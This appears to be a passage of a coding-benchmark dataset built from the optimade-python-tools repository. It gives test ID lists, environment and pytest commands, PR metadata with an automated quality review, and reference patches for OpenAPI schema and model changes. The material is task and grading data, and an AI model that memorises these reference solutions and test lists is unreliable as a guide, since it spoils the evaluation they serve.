"tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_nested_property_names", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_string_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_number_values", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_simple_comparisons", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_operators", 
"tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_filtering_on_relationships", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_other_provider_fields", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_not_implemented", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_length_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_suspected_timestamp_fields", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_unaliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_mongo_special_id", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliased_length_operator", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_aliases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_list_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_known_properties", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_precedence", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_special_cases", "tests/filtertransformers/test_mongo.py::TestMongoTransformer::test_constant_first_comparisson", "tests/server/routers/test_structures.py::test_awkward_nested_provider_field" ]
[ "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_repr", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_parser_version", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_empty", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_property_names", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_number_values", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_operators", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_id", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_string_operations", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_list_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_properties", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_precedence", "tests/filterparser/test_filterparser.py::TestParserV1_0_0::test_special_cases", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresEndpoint::test_get_next_responses", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestSingleStructureEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::test_check_response_single_structure", 
"tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_response_okay", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_meta_response", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_serialize_response", "tests/server/routers/test_structures.py::TestMissingSingleStructureEndpoint::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestSingleStructureWithRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithSharedRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_meta_response", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_response_okay", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_meta_response", 
"tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_serialize_response", "tests/server/routers/test_structures.py::TestMultiStructureWithOverlappingRelationships::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsDoNotMatchNegatedFilters::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithNullFieldsMatchUnknownFilter::test_structures_endpoint_data", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_response_okay", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_meta_response", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_serialize_response", "tests/server/routers/test_structures.py::TestStructuresWithUnknownResponseFields::test_structures_endpoint_data", "tests/server/test_client.py::test_client_endpoints[False]", "tests/server/test_client.py::test_client_endpoints[True]", "tests/server/test_client.py::test_filter_validation[True]", "tests/server/test_client.py::test_filter_validation[False]", "tests/server/test_client.py::test_client_response_fields[True]", "tests/server/test_client.py::test_client_response_fields[False]", 
"tests/server/test_client.py::test_multiple_base_urls[True]", "tests/server/test_client.py::test_multiple_base_urls[False]", "tests/server/test_client.py::test_include_exclude_providers[True]", "tests/server/test_client.py::test_include_exclude_providers[False]", "tests/server/test_client.py::test_client_sort[True]", "tests/server/test_client.py::test_client_sort[False]", "tests/server/test_client.py::test_command_line_client[True]", "tests/server/test_client.py::test_command_line_client[False]", "tests/server/test_client.py::test_command_line_client_silent[True]", "tests/server/test_client.py::test_command_line_client_silent[False]", "tests/server/test_client.py::test_command_line_client_multi_provider[True]", "tests/server/test_client.py::test_command_line_client_multi_provider[False]", "tests/server/test_client.py::test_command_line_client_write_to_file[True]", "tests/server/test_client.py::test_command_line_client_write_to_file[False]", "tests/server/test_client.py::test_strict_async[True]", "tests/server/test_client.py::test_strict_async[False]", "tests/server/test_client.py::test_client_global_data_callback[True]", "tests/server/test_client.py::test_client_global_data_callback[False]", "tests/server/test_client.py::test_client_page_skip_callback[True]", "tests/server/test_client.py::test_client_page_skip_callback[False]", "tests/server/test_client.py::test_client_mutable_data_callback[True]", "tests/server/test_client.py::test_client_mutable_data_callback[False]", "tests/server/test_client.py::test_client_asynchronous_write_callback[True]", "tests/server/test_client.py::test_client_asynchronous_write_callback[False]", "tests/server/test_client.py::test_list_properties[True]", "tests/server/test_client.py::test_list_properties[False]", "tests/server/test_client.py::test_binary_search_internals[1_0]", "tests/server/test_client.py::test_binary_search_internals[2_0]", "tests/server/test_client.py::test_binary_search_internals[1_1]", 
"tests/server/test_client.py::test_binary_search_internals[1_2]", "tests/server/test_client.py::test_binary_search_internals[1_3]", "tests/server/test_client.py::test_binary_search_internals[2_1]", "tests/server/test_client.py::test_binary_search_internals[2_2]", "tests/server/test_client.py::test_binary_search_internals[3]", "tests/server/test_client.py::test_binary_search_internals[4]", "tests/server/test_client.py::test_binary_search_internals[5]", "tests/server/test_client.py::test_binary_search_internals[6]", "tests/server/test_client.py::test_binary_search_internals[7]", "tests/server/test_client.py::test_binary_search_internals[9]", "tests/server/test_client.py::test_binary_search_internals[12]", "tests/server/test_client.py::test_binary_search_internals[14]", "tests/server/test_client.py::test_binary_search_internals[18]", "tests/server/test_client.py::test_binary_search_internals[22]", "tests/server/test_client.py::test_binary_search_internals[27]", "tests/server/test_client.py::test_binary_search_internals[33]", "tests/server/test_client.py::test_binary_search_internals[41]", "tests/server/test_client.py::test_binary_search_internals[51]", "tests/server/test_client.py::test_binary_search_internals[63]", "tests/server/test_client.py::test_binary_search_internals[77]", "tests/server/test_client.py::test_binary_search_internals[95]", "tests/server/test_client.py::test_binary_search_internals[117]", "tests/server/test_client.py::test_binary_search_internals[144]", "tests/server/test_client.py::test_binary_search_internals[177]", "tests/server/test_client.py::test_binary_search_internals[218]", "tests/server/test_client.py::test_binary_search_internals[269]", "tests/server/test_client.py::test_binary_search_internals[331]", "tests/server/test_client.py::test_binary_search_internals[407]", "tests/server/test_client.py::test_binary_search_internals[501]", "tests/server/test_client.py::test_binary_search_internals[616]", 
"tests/server/test_client.py::test_binary_search_internals[758]", "tests/server/test_client.py::test_binary_search_internals[933]", "tests/server/test_client.py::test_binary_search_internals[1148]", "tests/server/test_client.py::test_binary_search_internals[1412]", "tests/server/test_client.py::test_binary_search_internals[1737]", "tests/server/test_client.py::test_binary_search_internals[2137]", "tests/server/test_client.py::test_binary_search_internals[2630]", "tests/server/test_client.py::test_binary_search_internals[3235]", "tests/server/test_client.py::test_binary_search_internals[3981]", "tests/server/test_client.py::test_binary_search_internals[4897]", "tests/server/test_client.py::test_binary_search_internals[6025]", "tests/server/test_client.py::test_binary_search_internals[7413]", "tests/server/test_client.py::test_binary_search_internals[9120]", "tests/server/test_client.py::test_binary_search_internals[11220]", "tests/server/test_client.py::test_binary_search_internals[13803]", "tests/server/test_client.py::test_binary_search_internals[16982]", "tests/server/test_client.py::test_binary_search_internals[20892]", "tests/server/test_client.py::test_binary_search_internals[25703]", "tests/server/test_client.py::test_binary_search_internals[31622]", "tests/server/test_client.py::test_binary_search_internals[38904]", "tests/server/test_client.py::test_binary_search_internals[47863]", "tests/server/test_client.py::test_binary_search_internals[58884]", "tests/server/test_client.py::test_binary_search_internals[72443]", "tests/server/test_client.py::test_binary_search_internals[89125]", "tests/server/test_client.py::test_binary_search_internals[109647]", "tests/server/test_client.py::test_binary_search_internals[134896]", "tests/server/test_client.py::test_binary_search_internals[165958]", "tests/server/test_client.py::test_binary_search_internals[204173]", "tests/server/test_client.py::test_binary_search_internals[251188]", 
"tests/server/test_client.py::test_binary_search_internals[309029]", "tests/server/test_client.py::test_binary_search_internals[380189]", "tests/server/test_client.py::test_binary_search_internals[467735]", "tests/server/test_client.py::test_binary_search_internals[575439]", "tests/server/test_client.py::test_binary_search_internals[707945]", "tests/server/test_client.py::test_binary_search_internals[870963]", "tests/server/test_client.py::test_binary_search_internals[1071519]", "tests/server/test_client.py::test_binary_search_internals[1318256]", "tests/server/test_client.py::test_binary_search_internals[1621810]", "tests/server/test_client.py::test_binary_search_internals[1995262]", "tests/server/test_client.py::test_binary_search_internals[2454708]", "tests/server/test_client.py::test_binary_search_internals[3019951]", "tests/server/test_client.py::test_binary_search_internals[3715352]", "tests/server/test_client.py::test_binary_search_internals[4570881]", "tests/server/test_client.py::test_binary_search_internals[5623413]", "tests/server/test_client.py::test_binary_search_internals[6918309]", "tests/server/test_client.py::test_binary_search_internals[8511380]", "tests/server/test_client.py::test_binary_search_internals[10471285]", "tests/server/test_client.py::test_binary_search_internals[12882495]", "tests/server/test_client.py::test_binary_search_internals[15848931]", "tests/server/test_client.py::test_binary_search_internals[19498445]", "tests/server/test_client.py::test_binary_search_internals[23988329]", "tests/server/test_client.py::test_binary_search_internals[29512092]", "tests/server/test_client.py::test_binary_search_internals[36307805]", "tests/server/test_client.py::test_binary_search_internals[44668359]", "tests/server/test_client.py::test_binary_search_internals[54954087]", "tests/server/test_client.py::test_binary_search_internals[67608297]", "tests/server/test_client.py::test_binary_search_internals[83176377]", 
"tests/server/test_client.py::test_binary_search_internals[102329299]", "tests/server/test_client.py::test_binary_search_internals[125892541]", "tests/server/test_client.py::test_binary_search_internals[154881661]", "tests/server/test_client.py::test_binary_search_internals[190546071]", "tests/server/test_client.py::test_binary_search_internals[234422881]", "tests/server/test_client.py::test_binary_search_internals[288403150]", "tests/server/test_client.py::test_binary_search_internals[354813389]", "tests/server/test_client.py::test_binary_search_internals[436515832]", "tests/server/test_client.py::test_binary_search_internals[537031796]", "tests/server/test_client.py::test_binary_search_internals[660693448]", "tests/server/test_client.py::test_binary_search_internals[812830516]", "tests/server/test_client.py::test_binary_search_internals[1000000000]", "tests/server/test_client.py::test_raw_get_one_sync", "tests/server/test_client.py::test_raw_get_one_async" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning tests/filterparser/test_filterparser.py tests/filtertransformers/test_mongo.py tests/server/routers/test_structures.py tests/server/test_client.py" }
{ "num_modified_files": 2, "num_modified_lines": 6, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue aims to make the v1.2 grammar the default and relax nested field identifier rules, adding a new provider field for testing. The test suite checks the default variant, parser handling of nested identifiers, Mongo transformer output, server filtering on the new field, client property count, and config inclusion, all directly reflecting the described changes. No evidence of test coupling, implicit naming, external dependencies, ambiguous specifications, unrelated patch artifacts, or hidden domain knowledge is present, so the task is clearly specified and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, 
"test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
61b271d41049de4d5e59c4650c175717ae9d26e7
2019-07-26 12:37:27
codecov[bot]: # [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=h1) Report > Merging [#60](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=desc) into [master](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/commit/61b271d41049de4d5e59c4650c175717ae9d26e7?src=pr&el=desc) will **not change** coverage. > The diff coverage is `100%`. [![Impacted file tree graph](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/graphs/tree.svg?width=650&token=UJAtmqkZZO&height=150&src=pr)](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=tree) ```diff @@ Coverage Diff @@ ## master #60 +/- ## ======================================= Coverage 76.73% 76.73% ======================================= Files 19 19 Lines 649 649 ======================================= Hits 498 498 Misses 151 151 ``` | [Impacted Files](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=tree) | Coverage Δ | | |---|---|---| | [optimade/server/models/structures.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/diff?src=pr&el=tree#diff-b3B0aW1hZGUvc2VydmVyL21vZGVscy9zdHJ1Y3R1cmVzLnB5) | `59.67% <100%> (ø)` | :arrow_up: | | [...imade/filtertransformers/tests/test\_transformer.py](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60/diff?src=pr&el=tree#diff-b3B0aW1hZGUvZmlsdGVydHJhbnNmb3JtZXJzL3Rlc3RzL3Rlc3RfdHJhbnNmb3JtZXIucHk=) | `100% <100%> (ø)` | :arrow_up: | ------ [Continue to review full report at Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=continue). > **Legend** - [Click here to learn more](https://docs.codecov.io/docs/codecov-delta) > `Δ = absolute <relative> (impact)`, `ø = not affected`, `? = missing data` > Powered by [Codecov](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=footer). 
Last update [61b271d...904c084](https://codecov.io/gh/Materials-Consortia/optimade-python-tools/pull/60?src=pr&el=lastupdated). Read the [comment docs](https://docs.codecov.io/docs/pull-request-comments).
materials-consortia__optimade-python-tools-60
diff --git a/optimade/server/models/structures.py b/optimade/server/models/structures.py index 1ea902a2..3b7a5cd9 100644 --- a/optimade/server/models/structures.py +++ b/optimade/server/models/structures.py @@ -260,7 +260,7 @@ the elements in this list each refer to the direction of the corresponding entry """, ) - lattice_types: Optional[List[conlist(len_eq=3)]] = Schema( + lattice_vectors: Optional[List[conlist(len_eq=3)]] = Schema( ..., description="""List of three lattice vectors in Cartesian coordinates, in ångströms (Å).
Some minor fixes - Fixed a typo in our version of the schema for the field name `lattice_types` -> `lattice_vectors`. - Switched the final test that needed a mongo server running to `mongomock` (I assume this is what we want @dwinston )
**Title** Correct structure schema field name and replace MongoDB dependency in tests **Problem** The structure model exposed a misspelled field name, leading to schema mismatches and validation errors. Additionally, the integration test required a live MongoDB instance, causing failures in environments without the service. **Root Cause** A typographical error defined the field as `lattice_types` instead of the intended `lattice_vectors`, and the test was tightly coupled to a real MongoDB server. **Fix / Expected Behavior** - Expose the correct `lattice_vectors` field in the structure schema. - Ensure the schema description accurately reflects the list of three Cartesian lattice vectors. - Modify the affected test to employ an in‑memory MongoDB mock, removing the external dependency. - All validation and API responses should now include the properly named field. - The test suite runs successfully in CI without requiring a MongoDB server. **Risk & Validation** - Verify that any existing code referencing the old field name is updated to prevent breakage. - Run the full test suite, confirming that the mocked database behavior mirrors the real server for the tested scenarios. - Perform a quick manual API check to ensure the response payload contains `lattice_vectors` with the expected format.
60
Materials-Consortia/optimade-python-tools
diff --git a/optimade/filtertransformers/tests/test_transformer.py b/optimade/filtertransformers/tests/test_transformer.py index fb6a60bb..a51ea683 100644 --- a/optimade/filtertransformers/tests/test_transformer.py +++ b/optimade/filtertransformers/tests/test_transformer.py @@ -2,7 +2,7 @@ import itertools from unittest import TestCase import uuid -from pymongo import MongoClient +from mongomock import MongoClient from optimade.filterparser import LarkParser from optimade.filtertransformers.mongo import MongoTransformer
[ "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_conjunctions" ]
[ "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_not", "optimade/filtertransformers/tests/test_transformer.py::TestTransformer::test_simple_comparisons" ]
No new interfaces are introduced.
MIT
{ "base_image_name": "python_base_310", "install": [ "git submodule update --init --recursive", "pip install -q -r requirements.txt -r requirements-dev.txt -r requirements-server.txt -r requirements-http-client.txt", "pip install -q -e ." ], "log_parser": "parse_log_pytest", "test_cmd": "pytest --no-header -rA --tb=line --color=no -p no:cacheprovider -W ignore::DeprecationWarning optimade/filtertransformers/tests/test_transformer.py" }
{ "num_modified_files": 1, "num_modified_lines": 1, "pr_author": "ml-evs", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.94, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug", "dev_ops_enh" ], "reason": null, "reasoning": "The issue requests two concrete changes: rename the schema field from `lattice_types` to `lattice_vectors` and replace the real MongoDB client import with `mongomock` for tests. The provided test patch directly implements the second change and matches the test expectations, while the schema rename is straightforward and implied by the golden patch. There are no hidden dependencies, ambiguous requirements, or mismatches between the tests and the stated intent, so the task is clearly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
c5b579f7a219bbf2e774052cbc71128c1fd82cb0
2020-01-13 11:05:08
materials-consortia__optimade-python-tools-131
diff --git a/openapi/index_openapi.json b/openapi/index_openapi.json index a53f6a6f..3bb04fff 100644 --- a/openapi/index_openapi.json +++ b/openapi/index_openapi.json @@ -606,8 +606,23 @@ }, "description": "A JSON object containing information about an available API version" }, - "BaseResource": { - "title": "BaseResource", + "BaseRealationshipMeta": { + "title": "BaseRealationshipMeta", + "required": [ + "description" + ], + "type": "object", + "properties": { + "description": { + "title": "Description", + "type": "string", + "description": "OPTIONAL human-readable description of the relationship" + } + }, + "description": "Specific meta field for base relationship resource" + }, + "BaseRelationshipResource": { + "title": "BaseRelationshipResource", "required": [ "id", "type" @@ -623,9 +638,18 @@ "title": "Type", "type": "string", "description": "Resource type" + }, + "meta": { + "title": "Meta", + "allOf": [ + { + "$ref": "#/components/schemas/BaseRealationshipMeta" + } + ], + "description": "Relationship meta field. MUST contain 'description' if supplied." } }, - "description": "Minimum requirements to represent a Resource" + "description": "Minimum requirements to represent a relationship resource" }, "EntryRelationships": { "title": "EntryRelationships", @@ -1417,14 +1441,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -1440,7 +1464,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." 
+ "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "RelatedChildResource": { "title": "RelatedChildResource", @@ -1716,14 +1740,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -1739,7 +1763,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "ToplevelLinks": { "title": "ToplevelLinks", diff --git a/openapi/openapi.json b/openapi/openapi.json index 74477055..5d39877f 100644 --- a/openapi/openapi.json +++ b/openapi/openapi.json @@ -2342,8 +2342,23 @@ }, "description": "Resource objects appear in a JSON:API document to represent resources." }, - "BaseResource": { - "title": "BaseResource", + "BaseRealationshipMeta": { + "title": "BaseRealationshipMeta", + "required": [ + "description" + ], + "type": "object", + "properties": { + "description": { + "title": "Description", + "type": "string", + "description": "OPTIONAL human-readable description of the relationship" + } + }, + "description": "Specific meta field for base relationship resource" + }, + "BaseRelationshipResource": { + "title": "BaseRelationshipResource", "required": [ "id", "type" @@ -2359,9 +2374,18 @@ "title": "Type", "type": "string", "description": "Resource type" + }, + "meta": { + "title": "Meta", + "allOf": [ + { + "$ref": "#/components/schemas/BaseRealationshipMeta" + } + ], + "description": "Relationship meta field. MUST contain 'description' if supplied." 
} }, - "description": "Minimum requirements to represent a Resource" + "description": "Minimum requirements to represent a relationship resource" }, "EntryInfoProperty": { "title": "EntryInfoProperty", @@ -3168,14 +3192,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -3191,7 +3215,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." + "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "ReferenceResource": { "title": "ReferenceResource", @@ -3845,14 +3869,14 @@ { "allOf": [ { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } ] }, { "type": "array", "items": { - "$ref": "#/components/schemas/BaseResource" + "$ref": "#/components/schemas/BaseRelationshipResource" } } ], @@ -3868,7 +3892,7 @@ "description": "a meta object that contains non-standard meta-information about the relationship." } }, - "description": "Representation references from the resource object in which it\u2019s defined to other resource objects." 
+ "description": "Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource" }, "StructureResource": { "title": "StructureResource", diff --git a/optimade/models/baseinfo.py b/optimade/models/baseinfo.py index 32df32dc..3109b63f 100644 --- a/optimade/models/baseinfo.py +++ b/optimade/models/baseinfo.py @@ -1,3 +1,4 @@ +# pylint: disable=no-self-argument import re from typing import Dict, List, Optional diff --git a/optimade/models/entries.py b/optimade/models/entries.py index 8c854de7..b78bc66d 100644 --- a/optimade/models/entries.py +++ b/optimade/models/entries.py @@ -1,9 +1,10 @@ -# pylint: disable=line-too-long +# pylint: disable=line-too-long,no-self-argument from datetime import datetime from typing import Optional, Dict, List from pydantic import BaseModel, Field, validator -from .jsonapi import Relationships, Attributes, Resource, Relationship +from .jsonapi import Relationships, Attributes, Resource +from .optimade_json import Relationship __all__ = ( diff --git a/optimade/models/jsonapi.py b/optimade/models/jsonapi.py index 5767a65a..05ab1a72 100644 --- a/optimade/models/jsonapi.py +++ b/optimade/models/jsonapi.py @@ -1,6 +1,7 @@ """This module should reproduce JSON API v1.0 https://jsonapi.org/format/1.0/""" -from typing import Optional, Set, Union, Any, List -from pydantic import BaseModel, AnyUrl, Field, validator, root_validator +# pylint: disable=no-self-argument +from typing import Optional, Set, Union, List +from pydantic import BaseModel, AnyUrl, Field, root_validator __all__ = ( diff --git a/optimade/models/links.py b/optimade/models/links.py index d6409468..0e1c34c2 100644 --- a/optimade/models/links.py +++ b/optimade/models/links.py @@ -1,3 +1,4 @@ +# pylint: disable=no-self-argument from pydantic import Field, AnyUrl, validator, root_validator from typing import Union diff --git a/optimade/models/optimade_json.py b/optimade/models/optimade_json.py index a3263ca7..55c0dda5 100644 --- 
a/optimade/models/optimade_json.py +++ b/optimade/models/optimade_json.py @@ -1,11 +1,20 @@ """Modified JSON API v1.0 for OPTiMaDe API""" -from pydantic import Field, validator, root_validator -from typing import Optional, Set +# pylint: disable=no-self-argument +from pydantic import Field, root_validator, BaseModel +from typing import Optional, Set, Union, List from . import jsonapi -__all__ = ("Error", "Failure", "Success", "Warnings") +__all__ = ( + "Error", + "Failure", + "Success", + "Warnings", + "BaseRealationshipMeta", + "BaseRelationshipResource", + "Relationship", +) class Error(jsonapi.Error): @@ -91,3 +100,28 @@ class Warnings(Error): if values.get("status", None) is not None: raise ValueError("status MUST NOT be specified for warnings") return values + + +class BaseRealationshipMeta(BaseModel): + """Specific meta field for base relationship resource""" + + description: str = Field( + ..., description="OPTIONAL human-readable description of the relationship" + ) + + +class BaseRelationshipResource(jsonapi.BaseResource): + """Minimum requirements to represent a relationship resource""" + + meta: Optional[BaseRealationshipMeta] = Field( + None, + description="Relationship meta field. 
MUST contain 'description' if supplied.", + ) + + +class Relationship(jsonapi.Relationship): + """Similar to normal JSON API relationship, but with addition of OPTIONAL meta field for a resource""" + + data: Optional[ + Union[BaseRelationshipResource, List[BaseRelationshipResource]] + ] = Field(None, description="Resource linkage") diff --git a/optimade/models/references.py b/optimade/models/references.py index 27e8acd2..9198cce6 100644 --- a/optimade/models/references.py +++ b/optimade/models/references.py @@ -1,3 +1,4 @@ +# pylint: disable=line-too-long,no-self-argument from pydantic import Field, BaseModel, AnyUrl, validator from typing import List, Optional diff --git a/optimade/models/toplevel.py b/optimade/models/toplevel.py index 10ef0603..9160d4c8 100644 --- a/optimade/models/toplevel.py +++ b/optimade/models/toplevel.py @@ -1,14 +1,7 @@ from datetime import datetime from typing import Union, List, Optional, Dict, Any -from pydantic import ( # pylint: disable=no-name-in-module - BaseModel, - validator, - AnyUrl, - AnyHttpUrl, - Field, - EmailStr, -) +from pydantic import BaseModel, AnyHttpUrl, Field, EmailStr from .jsonapi import Link, Meta from .utils import NonnegativeInt
